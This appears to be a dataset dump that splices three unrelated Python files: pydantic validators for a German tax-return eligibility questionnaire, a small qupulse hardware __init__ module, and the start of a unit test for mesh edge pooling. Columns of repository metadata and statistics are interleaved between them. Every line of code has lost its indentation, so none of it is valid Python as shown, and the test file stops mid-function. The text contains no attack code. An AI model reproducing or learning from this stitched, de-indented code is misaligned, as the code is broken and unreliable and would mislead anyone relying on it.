class MarriedJointTaxesEligibilityData(RecursiveDataModel):
not_separated: Optional[NotSeparatedEligibilityData]
joint_taxes_eligibility: str
@validator('joint_taxes_eligibility')
def married_couples_must_do_joint_taxes(cls, v):
return declarations_must_be_set_yes(v)
@validator('not_separated', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class AlimonyMarriedEligibilityData(RecursiveDataModel):
married_joint_taxes: Optional[MarriedJointTaxesEligibilityData]
separated_joint_taxes: Optional[SeparatedJointTaxesEligibilityData]
alimony_eligibility: str
@validator('alimony_eligibility')
def do_not_receive_or_pay_alimony(cls, v):
return declarations_must_be_set_no(v)
@validator('separated_joint_taxes', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class UserANoElsterAccountEligibilityData(RecursiveDataModel):
alimony: Optional[AlimonyMarriedEligibilityData]
user_a_has_elster_account_eligibility: str
@validator('user_a_has_elster_account_eligibility')
def must_not_have_elster_account(cls, v):
return declarations_must_be_set_no(v)
@validator('alimony', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class UserAElsterAccountEligibilityData(RecursiveDataModel):
alimony: Optional[AlimonyMarriedEligibilityData]
user_a_has_elster_account_eligibility: str
@validator('user_a_has_elster_account_eligibility')
def has_elster_account(cls, v):
return declarations_must_be_set_yes(v)
@validator('alimony', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class UserBNoElsterAccountEligibilityData(RecursiveDataModel):
user_a_has_elster_account: Optional[UserAElsterAccountEligibilityData]
user_b_has_elster_account_eligibility: str
@validator('user_b_has_elster_account_eligibility')
def user_b_must_not_have_elster_account(cls, v):
return declarations_must_be_set_no(v)
@validator('user_a_has_elster_account', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class UserBElsterAccountEligibilityData(RecursiveDataModel):
user_a_has_elster_account: Optional[UserAElsterAccountEligibilityData]
user_b_has_elster_account_eligibility: str
@validator('user_b_has_elster_account_eligibility')
def user_b_must_have_elster_account(cls, v):
return declarations_must_be_set_yes(v)
@validator('user_a_has_elster_account', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class DivorcedJointTaxesEligibilityData(RecursiveDataModel):
familienstand: Optional[DivorcedEligibilityData]
joint_taxes_eligibility: str
@validator('joint_taxes_eligibility')
def divorced_couples_must_do_separate_taxes(cls, v, values):
return declarations_must_be_set_no(v)
@validator('familienstand', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class AlimonyEligibilityData(RecursiveDataModel):
is_widowed: Optional[WidowedEligibilityData]
is_single: Optional[SingleEligibilityData]
divorced_joint_taxes: Optional[DivorcedJointTaxesEligibilityData]
no_separated_lived_together: Optional[SeparatedNotLivedTogetherEligibilityData]
no_separated_joint_taxes: Optional[SeparatedNoJointTaxesEligibilityData]
alimony_eligibility: str
@validator('alimony_eligibility')
def do_not_receive_or_pay_alimony(cls, v):
return declarations_must_be_set_no(v)
@validator('no_separated_joint_taxes', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class SingleUserNoElsterAccountEligibilityData(RecursiveDataModel):
no_alimony: Optional[AlimonyEligibilityData]
user_a_has_elster_account_eligibility: str
@validator('user_a_has_elster_account_eligibility')
def must_not_have_elster_account(cls, v):
return declarations_must_be_set_no(v)
@validator('no_alimony', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class SingleUserElsterAccountEligibilityData(RecursiveDataModel):
no_alimony: Optional[AlimonyEligibilityData]
user_a_has_elster_account_eligibility: str
@validator('user_a_has_elster_account_eligibility')
def must_have_elster_account(cls, v):
return declarations_must_be_set_yes(v)
@validator('no_alimony', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class PensionEligibilityData(RecursiveDataModel):
single_user_a_has_elster_account: Optional[SingleUserElsterAccountEligibilityData]
single_user_has_no_elster_account: Optional[SingleUserNoElsterAccountEligibilityData]
user_a_has_no_elster_account: Optional[UserANoElsterAccountEligibilityData]
user_b_has_no_elster_account: Optional[UserBNoElsterAccountEligibilityData]
user_b_has_elster_account: Optional[UserBElsterAccountEligibilityData]
pension_eligibility: str
@validator('pension_eligibility')
def has_to_get_pension(cls, v):
return declarations_must_be_set_yes(v)
@validator('user_b_has_elster_account', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class InvestmentIncomeEligibilityData(RecursiveDataModel):
has_pension: Optional[PensionEligibilityData]
investment_income_eligibility: str
@validator('investment_income_eligibility')
def has_to_get_pension(cls, v):
return declarations_must_be_set_yes(v)
@validator('has_pension', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class MinimalInvestmentIncome(RecursiveDataModel):
has_investment_income: Optional[InvestmentIncomeEligibilityData]
minimal_investment_income_eligibility: str
@validator('minimal_investment_income_eligibility')
def has_only_minimal_invesment_income(cls, v):
return declarations_must_be_set_yes(v)
@validator('has_investment_income', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class MoreThanMinimalInvestmentIncome(RecursiveDataModel):
has_investment_income: Optional[InvestmentIncomeEligibilityData]
minimal_investment_income_eligibility: str
@validator('minimal_investment_income_eligibility')
def has_more_than_minimal_investment_income(cls, v):
return declarations_must_be_set_no(v)
@validator('has_investment_income', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class NoTaxedInvestmentIncome(RecursiveDataModel):
has_more_than_minimal_inv_income: Optional[MoreThanMinimalInvestmentIncome]
taxed_investment_income_eligibility: str
@validator('taxed_investment_income_eligibility')
def has_to_have_taxed_investment_income(cls, v):
return declarations_must_be_set_yes(v)
@validator('has_more_than_minimal_inv_income', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class CheaperCheckEligibilityData(RecursiveDataModel):
has_taxed_investment_income: Optional[NoTaxedInvestmentIncome]
cheaper_check_eligibility: str
@validator('cheaper_check_eligibility')
def has_to_want_no_cheaper_check(cls, v):
return declarations_must_be_set_no(v)
@validator('has_taxed_investment_income', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class NoInvestmentIncomeEligibilityData(RecursiveDataModel):
has_pension: Optional[PensionEligibilityData]
investment_income_eligibility: str
@validator('investment_income_eligibility')
def has_no_investment_income(cls, v):
return declarations_must_be_set_no(v)
@validator('has_pension', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class NoEmploymentIncomeEligibilityData(RecursiveDataModel):
only_taxed_inv_income: Optional[MinimalInvestmentIncome]
wants_no_cheaper_check: Optional[CheaperCheckEligibilityData]
has_no_investment_income: Optional[NoInvestmentIncomeEligibilityData]
employment_income_eligibility: str
@validator('employment_income_eligibility')
def has_no_employment_income(cls, v):
return declarations_must_be_set_no(v)
@validator('has_no_investment_income', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class EmploymentIncomeEligibilityData(RecursiveDataModel):
wants_no_cheaper_check: Optional[CheaperCheckEligibilityData]
has_no_investment_income: Optional[NoInvestmentIncomeEligibilityData]
only_taxed_inv_income: Optional[MinimalInvestmentIncome]
employment_income_eligibility: str
@validator('employment_income_eligibility')
def has_employment_income(cls, v):
return declarations_must_be_set_yes(v)
@validator('only_taxed_inv_income', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class MarginalEmploymentEligibilityData(RecursiveDataModel):
has_other_empl_income: Optional[EmploymentIncomeEligibilityData]
marginal_employment_eligibility: str
@validator('marginal_employment_eligibility')
def has_only_taxed_investment_income(cls, v):
return declarations_must_be_set_yes(v)
@validator('has_other_empl_income', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class OtherIncomeEligibilityData(RecursiveDataModel):
no_employment_income: Optional[NoEmploymentIncomeEligibilityData]
only_marginal_empl_income: Optional[MarginalEmploymentEligibilityData]
other_income_eligibility: str
@validator('other_income_eligibility')
def has_only_taxed_investment_income(cls, v):
return declarations_must_be_set_no(v)
@validator('only_marginal_empl_income', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class ForeignCountrySuccessEligibility(RecursiveDataModel):
"""
This is the only point where we have additional fields of previous steps on a step model.
That's because the ForeignCountry step is the last step of the flow and needs to decide which result page is
displayed: 'success' or 'maybe'.
"""
has_no_other_income: Optional[OtherIncomeEligibilityData]
foreign_country_eligibility: str
user_a_has_elster_account_eligibility: str
user_b_has_elster_account_eligibility: Optional[str]
@validator('user_b_has_elster_account_eligibility', always=True)
def users_must_not_all_have_elster_accounts(cls,v, values):
user_a_has_elster_account = values.get('user_a_has_elster_account_eligibility')
user_b_has_elster_account = v
# One person case
if not user_b_has_elster_account:
declarations_must_be_set_no(user_a_has_elster_account)
else:
# Two person case
try:
declarations_must_be_set_no(user_a_has_elster_account)
except:
declarations_must_be_set_no(user_b_has_elster_account)
return user_b_has_elster_account
@validator('foreign_country_eligibility')
def has_only_taxed_investment_income(cls, v):
return declarations_must_be_set_no(v)
@validator('has_no_other_income', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class ForeignCountryMaybeEligibility(RecursiveDataModel):
"""
This is the only point where we have additional fields of previous steps on a step model.
That's because the ForeignCountry step is the last step of the flow and needs to decide which result page is
displayed: 'success' or 'maybe'.
"""
has_no_other_income: Optional[OtherIncomeEligibilityData]
foreign_country_eligibility: str
user_a_has_elster_account_eligibility: str
user_b_has_elster_account_eligibility: Optional[str]
@validator('foreign_country_eligibility')
def has_only_taxed_investment_income(cls, v):
return declarations_must_be_set_no(v)
@validator('user_a_has_elster_account_eligibility')
def has_user_a_elster_account_eligibility(cls,v):
return declarations_must_be_set_yes(v)
@validator('user_b_has_elster_account_eligibility')
def has_user_b_elster_account_eligibility(cls,v):
return declarations_must_be_set_yes(v)
@validator('has_no_other_income', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
| 38.774194
| 116
| 0.78489
| 2,405
| 19,232
| 5.823285
| 0.069023
| 0.033559
| 0.042842
| 0.078686
| 0.781792
| 0.751803
| 0.724384
| 0.721314
| 0.715245
| 0.704248
| 0
| 0
| 0.144291
| 19,232
| 495
| 117
| 38.852525
| 0.851006
| 0.02865
| 0
| 0.640118
| 0
| 0
| 0.091588
| 0.077944
| 0
| 0
| 0
| 0
| 0
| 1
| 0.19764
| false
| 0.00295
| 0.011799
| 0.176991
| 0.743363
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
99a13581c139ce98e675c531dd7ace52b2994a4e
| 127
|
py
|
Python
|
qupulse/hardware/dacs/__init__.py
|
qutech-lab/qc-toolkit
|
f00e0d0000bdc7a6604ceae2c15b60f4d10c4000
|
[
"MIT"
] | 30
|
2018-09-13T02:59:55.000Z
|
2022-03-21T04:25:22.000Z
|
qupulse/hardware/dacs/__init__.py
|
qutech-lab/qc-toolkit
|
f00e0d0000bdc7a6604ceae2c15b60f4d10c4000
|
[
"MIT"
] | 319
|
2015-03-10T09:37:20.000Z
|
2018-09-06T10:11:32.000Z
|
qupulse/hardware/dacs/__init__.py
|
qutech-lab/qc-toolkit
|
f00e0d0000bdc7a6604ceae2c15b60f4d10c4000
|
[
"MIT"
] | 14
|
2019-01-08T14:42:36.000Z
|
2021-05-21T08:53:06.000Z
|
from qupulse.hardware.dacs.dac_base import *
try:
from qupulse.hardware.dacs.alazar import *
except ImportError:
pass
| 18.142857
| 46
| 0.755906
| 17
| 127
| 5.588235
| 0.705882
| 0.231579
| 0.4
| 0.484211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.165354
| 127
| 6
| 47
| 21.166667
| 0.896226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 9
|
99a637f4c659618ef26fd7ad82dd6f8c7019a830
| 177,451
|
py
|
Python
|
test/nn/pool/test_dual_primal_edge_pool.py
|
HarmonJiang/PD-MeshNet
|
e3f6c01ceff260778daf5fea66125413309e4399
|
[
"MIT"
] | 90
|
2020-10-23T13:50:45.000Z
|
2022-03-20T02:03:57.000Z
|
test/nn/pool/test_dual_primal_edge_pool.py
|
HarmonJiang/PD-MeshNet
|
e3f6c01ceff260778daf5fea66125413309e4399
|
[
"MIT"
] | 9
|
2020-11-04T20:36:38.000Z
|
2022-02-17T06:15:58.000Z
|
test/nn/pool/test_dual_primal_edge_pool.py
|
HarmonJiang/PD-MeshNet
|
e3f6c01ceff260778daf5fea66125413309e4399
|
[
"MIT"
] | 17
|
2020-10-26T23:06:21.000Z
|
2022-03-30T02:41:21.000Z
|
import numpy as np
import os.path as osp
from torch_geometric.utils.num_nodes import maybe_num_nodes
import torch
import unittest
from pd_mesh_net.nn import DualPrimalEdgePooling
from pd_mesh_net.utils import create_graphs, create_dual_primal_batch
current_dir = osp.dirname(__file__)
class TestDualEdgePooling(unittest.TestCase):
def test_large_simple_mesh_config_A_no_output_self_loops(self):
# In all cases, we aim at pooling the following pairs of primal edges,
# out of the 21 in the mesh:
# - 0->10 / 10->0;
# - 6->7 / 7->6;
# - 7->11 / 11->7;
# - 10->11 / 11->10;
# - 1->5 / 5->1;
# - 2->3 / 3->2;
# - 3->8 / 8->3;
# - 4->13 / 13->4.
# All the three experiments are repeated by considering once pooling
# based on decreasing attention coefficients and in the other pooling
# based on increasing attention coefficient (cf.
# `pd_mesh_net.nn.pool.DualPrimalEdgePooling`).
for use_decreasing_attention_coefficient in [True, False]:
# Test also with more than one attention head.
for num_heads in range(1, 4):
# Test with number of primal edges to keep.
self.__test_large_simple_mesh_config_A_no_output_self_loops(
num_primal_edges_to_keep=21 - 8,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
# Test with fraction of primal edges to keep. Pooling the top-8
# out of the 21 primal-edge pairs corresponds to keeping a
# fraction of the primal edges around (21 - 8) / 21 = 0.6190...
# Since the pooling layer internally finds the number of primal
# edges to pool as
# floor((1 - fraction_primal_edges_to_keep) * num_edges) =
# floor((1 - fraction_primal_edges_to_keep) * 21) = 8, one needs
# to have:
# 8 <= (1 - fraction_primal_edges_to_keep) * 21 < 9;
# <=> -13 <= -21* fraction_primal_edges_to_keep < -12;
# <=> 12 / 21 < fraction_primal_edges_to_keep <= 13/21;
# <=> 0.5714... < fraction_primal_edges_to_keep <= 0.6190...;
# e.g., 0.5715 < fraction_primal_edges_to_keep < 0.6190.
self.__test_large_simple_mesh_config_A_no_output_self_loops(
fraction_primal_edges_to_keep=0.619,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
# Test with minimal attention coefficient.
self.__test_large_simple_mesh_config_A_no_output_self_loops(
primal_att_coeff_threshold=0.5,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
def test_large_simple_mesh_config_A_no_output_self_loops_nonconsecutive(
self):
# Repeat the experiment by considering once pooling based on decreasing
# attention coefficients and in the other pooling based on increasing
# attention coefficient (cf. `pd_mesh_net.nn.pool.DualPrimalEdgePooling`).
for use_decreasing_attention_coefficient in [True, False]:
# Test also with more than one attention head.
for num_heads in range(1, 4):
self.__test_config_A_no_output_self_loops_nonconsecutive(
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
def test_large_simple_mesh_config_A_with_output_self_loops_nonconsecutive(
self):
# Repeat the experiment by considering once pooling based on decreasing
# attention coefficients and in the other pooling based on increasing
# attention coefficient (cf.
# `pd_mesh_net.nn.pool.DualPrimalEdgePooling`).
for use_decreasing_attention_coefficient in [True, False]:
# Test also with more than one attention head.
for num_heads in range(1, 4):
self.__test_config_A_with_output_self_loops_nonconsecutive(
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
def test_large_simple_mesh_config_A_with_output_self_loops(self):
# In all cases, we aim at pooling the following pairs of primal edges,
# out of the 21 in the mesh:
# - 0->10 / 10->0;
# - 6->7 / 7->6;
# - 7->11 / 11->7;
# - 10->11 / 11->10;
# - 1->5 / 5->1;
# - 2->3 / 3->2;
# - 3->8 / 8->3;
# - 4->13 / 13->4.
# All the three experiments are repeated by considering once pooling
# based on decreasing attention coefficients and in the other pooling
# based on increasing attention coefficient (cf.
# `pd_mesh_net.nn.pool.DualPrimalEdgePooling`).
for use_decreasing_attention_coefficient in [True, False]:
# Test also with more than one attention head.
for num_heads in range(1, 4):
# Test with number of primal edges to keep.
self.__test_large_simple_mesh_config_A_with_output_self_loops(
num_primal_edges_to_keep=21 - 8,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
# Test with fraction of primal edges to keep. Pooling the top-8
# out of the 21 primal-edge pairs corresponds to keeping a
# fraction of the primal edges around (21 - 8) / 21 = 0.6190...
# Since the pooling layer internally finds the number of primal
# edges to pool as
# floor((1 - fraction_primal_edges_to_keep) * num_edges) =
# floor((1 - fraction_primal_edges_to_keep) * 21) = 8, one needs
# to have:
# 8 <= (1 - fraction_primal_edges_to_keep) * 21 < 9;
# <=> -13 <= -21* fraction_primal_edges_to_keep < -12;
# <=> 12 / 21 < fraction_primal_edges_to_keep <= 13/21;
# <=> 0.5714... < fraction_primal_edges_to_keep <= 0.6190...;
# e.g., 0.5715 < fraction_primal_edges_to_keep < 0.6190.
self.__test_large_simple_mesh_config_A_with_output_self_loops(
fraction_primal_edges_to_keep=0.619,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
# Test with minimal attention coefficient.
self.__test_large_simple_mesh_config_A_with_output_self_loops(
primal_att_coeff_threshold=0.5,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
def test_large_simple_mesh_config_B_with_output_self_loops(self):
# In all cases, we aim at pooling the following pairs of primal edges,
# out of the 21 in the mesh:
# - 0->10 / 10->0;
# - 6->7 / 7->6;
# - 7->11 / 11->7;
# - 10->11 / 11->10;
# - 1->5 / 5->1;
# - 2->3 / 3->2;
# - 3->8 / 8->3;
# - 4->13 / 13->4.
# All the three experiments are repeated by considering once pooling
# based on decreasing attention coefficients and in the other pooling
# based on increasing attention coefficient (cf.
# `pd_mesh_net.nn.pool.DualPrimalEdgePooling`).
for use_decreasing_attention_coefficient in [True, False]:
# Test also with more than one attention head.
for num_heads in range(1, 4):
# Test with number of primal edges to keep.
self.__test_large_simple_mesh_config_B_with_output_self_loops(
num_primal_edges_to_keep=21 - 8,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
# Test with fraction of primal edges to keep. Pooling the top-8
# out of the 21 primal-edge pairs corresponds to keeping a
# fraction of the primal edges around (21 - 8) / 21 = 0.6190...
# Since the pooling layer internally finds the number of primal
# edges to pool as
# floor((1 - fraction_primal_edges_to_keep) * num_edges) =
# floor((1 - fraction_primal_edges_to_keep) * 21) = 8, one needs
# to have:
# 8 <= (1 - fraction_primal_edges_to_keep) * 21 < 9;
# <=> -13 <= -21* fraction_primal_edges_to_keep < -12;
# <=> 12 / 21 < fraction_primal_edges_to_keep <= 13/21;
# <=> 0.5714... < fraction_primal_edges_to_keep <= 0.6190...;
# e.g., 0.5715 < fraction_primal_edges_to_keep < 0.6190.
self.__test_large_simple_mesh_config_B_with_output_self_loops(
fraction_primal_edges_to_keep=0.619,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
# Test with minimal attention coefficient.
self.__test_large_simple_mesh_config_B_with_output_self_loops(
primal_att_coeff_threshold=0.5,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
def test_large_simple_mesh_config_B_with_output_self_loops_nonconsecutive(
self):
# Repeat the experiment by considering once pooling based on decreasing
# attention coefficients and in the other pooling based on increasing
# attention coefficient (cf.
# `pd_mesh_net.nn.pool.DualPrimalEdgePooling`).
for use_decreasing_attention_coefficient in [True, False]:
# Test also with more than one attention head.
for num_heads in range(1, 4):
self.__test_config_B_with_output_self_loops_nonconsecutive(
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
def test_large_simple_mesh_config_C_with_output_self_loops(self):
# In all cases, we aim at pooling the following pairs of primal edges,
# out of the 21 in the mesh:
# - 0->10 / 10->0;
# - 6->7 / 7->6;
# - 7->11 / 11->7;
# - 10->11 / 11->10;
# - 1->5 / 5->1;
# - 2->3 / 3->2;
# - 3->8 / 8->3;
# - 4->13 / 13->4.
# All the three experiments are repeated by considering once pooling
# based on decreasing attention coefficients and in the other pooling
# based on increasing attention coefficient (cf.
# `pd_mesh_net.nn.pool.DualPrimalEdgePooling`).
for use_decreasing_attention_coefficient in [True, False]:
# Test also with more than one attention head.
for num_heads in range(1, 4):
# Test with number of primal edges to keep.
self.__test_large_simple_mesh_config_C_with_output_self_loops(
num_primal_edges_to_keep=21 - 8,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
# Test with fraction of primal edges to keep. Pooling the top-8
# out of the 21 primal-edge pairs corresponds to keeping a
# fraction of the primal edges around (21 - 8) / 21 = 0.6190...
# Since the pooling layer internally finds the number of primal
# edges to pool as
# floor((1 - fraction_primal_edges_to_keep) * num_edges) =
# floor((1 - fraction_primal_edges_to_keep) * 21) = 8, one needs
# to have:
# 8 <= (1 - fraction_primal_edges_to_keep) * 21 < 9;
# <=> -13 <= -21* fraction_primal_edges_to_keep < -12;
# <=> 12 / 21 < fraction_primal_edges_to_keep <= 13/21;
# <=> 0.5714... < fraction_primal_edges_to_keep <= 0.6190...;
# e.g., 0.5715 < fraction_primal_edges_to_keep < 0.6190.
self.__test_large_simple_mesh_config_C_with_output_self_loops(
fraction_primal_edges_to_keep=0.619,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
# Test with minimal attention coefficient.
self.__test_large_simple_mesh_config_C_with_output_self_loops(
primal_att_coeff_threshold=0.5,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
def test_large_simple_mesh_config_C_with_output_self_loops_nonconsecutive(
self):
# Repeat the experiment by considering once pooling based on decreasing
# attention coefficients and in the other pooling based on increasing
# attention coefficient (cf.
# `pd_mesh_net.nn.pool.DualPrimalEdgePooling`).
for use_decreasing_attention_coefficient in [True, False]:
# Test also with more than one attention head.
for num_heads in range(1, 4):
self.__test_config_C_with_output_self_loops_nonconsecutive(
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
num_heads=num_heads)
def __test_large_simple_mesh_config_A_no_output_self_loops(
self,
num_primal_edges_to_keep=None,
fraction_primal_edges_to_keep=None,
primal_att_coeff_threshold=None,
use_decreasing_attention_coefficient=True,
num_heads=1):
# - Dual-graph configuration A.
single_dual_nodes = True
undirected_dual_edges = True
graph_creator = create_graphs.GraphCreator(
mesh_filename=osp.join(current_dir,
'../../common_data/simple_mesh_large.ply'),
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
primal_features_from_dual_features=False)
primal_graph, dual_graph = graph_creator.create_graphs()
petdni = graph_creator.primal_edge_to_dual_node_idx
(primal_graph_batch, dual_graph_batch,
petdni_batch) = create_dual_primal_batch(
primal_graphs_list=[primal_graph],
dual_graphs_list=[dual_graph],
primal_edge_to_dual_node_idx_list=[petdni])
# Primal graph.
num_primal_edges = primal_graph_batch.num_edges
num_primal_nodes = maybe_num_nodes(primal_graph_batch.edge_index)
self.assertEqual(num_primal_edges, 42)
self.assertEqual(num_primal_nodes, 14)
# - Check existence of primal edges.
for edge in [(0, 1), (0, 7), (0, 10), (1, 2), (1, 5), (2, 3), (2, 9),
(3, 4), (3, 8), (4, 5), (4, 13), (5, 6), (6, 7), (6, 12),
(7, 11), (8, 9), (8, 13), (9, 10), (10, 11), (11, 12),
(12, 13)]:
self.assertEqual(petdni_batch[edge], petdni_batch[edge[::-1]])
# - Set the features of each primal node randomly.
dim_primal_features = primal_graph_batch.num_node_features
for primal_feature in primal_graph_batch.x:
primal_feature[:] = torch.rand(dim_primal_features,
dtype=torch.float)
# Dual graph.
num_dual_edges = dual_graph_batch.num_edges
num_dual_nodes = maybe_num_nodes(dual_graph_batch.edge_index)
# - Since the mesh is watertight, the medial graph of the triangulation
# is 4-regular, hence each node in the dual graph has 4 incoming edges
# and 4 outgoing edges. However, since there are no self-loops in the
# dual graph, each incoming edge for a certain dual node is also an
# outgoing edge for another dual node, and the total number of
# (directed) edges in the dual graph is 4 times the number of dual
# nodes.
self.assertEqual(num_dual_edges, num_dual_nodes * 4)
self.assertEqual(num_dual_nodes, num_primal_edges // 2)
# - Set the features of each dual node randomly.
dim_dual_features = dual_graph_batch.num_node_features
for dual_feature in dual_graph_batch.x:
dual_feature[:] = torch.rand(dim_dual_features,
dtype=torch.float) * 3
# Randomly shuffle the primal edge-index matrix.
permutation = np.random.permutation(num_primal_edges)
primal_graph_batch.edge_index = (
primal_graph_batch.edge_index[:, permutation])
# Set the attention coefficients manually, so as to pool the following
# primal edges:
# - 0->10 / 10->0;
# - 6->7 / 7->6;
# - 7->11 / 11->7;
# - 10->11 / 11->10;
# - 1->5 / 5->1;
# - 2->3 / 3->2;
# - 3->8 / 8->3;
# - 4->13 / 13->4.
# (cf. file `../../common_data/simple_mesh_large_pool_1.png`)
if (primal_att_coeff_threshold is not None):
attention_threshold = primal_att_coeff_threshold
else:
attention_threshold = 0.5
primal_attention_coeffs = torch.rand(
[num_primal_edges, num_heads],
dtype=torch.float) * attention_threshold
if (use_decreasing_attention_coefficient):
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) in [[0, 10], [6, 7], [7, 11], [10, 11],
[1, 5], [2, 3], [3, 8], [4, 13]]):
primal_attention_coeffs[edge_idx] += (1 -
attention_threshold)
elif (primal_edge == [1, 2]):
# Further test: set \alpha_{2, 1} = 0.7 > 0.5, but
# \alpha_{1, 2} = 0.2, so that
# (\alpha_{1, 2} + \alpha_{2, 1}) / 2 = 0.45 < 0.5, and the
# edges 1->2 / 2->1 do not get pooled.
primal_attention_coeffs[edge_idx] = 0.2
elif (primal_edge == [2, 1]):
primal_attention_coeffs[edge_idx] = 0.7
else:
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) not in [[0, 10], [6, 7], [7, 11],
[10, 11], [1, 5], [2, 3],
[3, 8], [4, 13], [1, 2]]):
primal_attention_coeffs[edge_idx] += (1 -
attention_threshold)
elif (primal_edge == [1, 2]):
# Further test: set \alpha_{1, 2} = 0.4 < 0.5, but
# \alpha_{2, 1} = 0.7, so that
# (\alpha_{1, 2} + \alpha_{2, 1}) / 2 = 0.55 > 0.5, and the
# edges 1->2 / 2->1 do not get pooled.
primal_attention_coeffs[edge_idx] = 0.4
elif (primal_edge == [2, 1]):
primal_attention_coeffs[edge_idx] = 0.7
# Create a single dual-primal edge-pooling layer.
pool = DualPrimalEdgePooling(
self_loops_in_output_dual_graph=False,
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
num_primal_edges_to_keep=num_primal_edges_to_keep,
fraction_primal_edges_to_keep=fraction_primal_edges_to_keep,
primal_att_coeff_threshold=primal_att_coeff_threshold,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
return_old_dual_node_to_new_dual_node=True)
# Perform primal-edge pooling.
(new_primal_graph_batch, new_dual_graph_batch, new_petdni_batch,
pooling_log) = pool(primal_graph_batch=primal_graph_batch,
dual_graph_batch=dual_graph_batch,
primal_edge_to_dual_node_idx_batch=petdni_batch,
primal_attention_coeffs=primal_attention_coeffs)
# Tests on the new primal graph.
num_new_primal_nodes = maybe_num_nodes(
new_primal_graph_batch.edge_index)
num_new_primal_edges = new_primal_graph_batch.num_edges
self.assertEqual(num_new_primal_nodes, 6)
# - Check correspondence of the old primal nodes with the new primal
# nodes (i.e., node clusters).
old_primal_node_to_new_one = pooling_log.old_primal_node_to_new_one
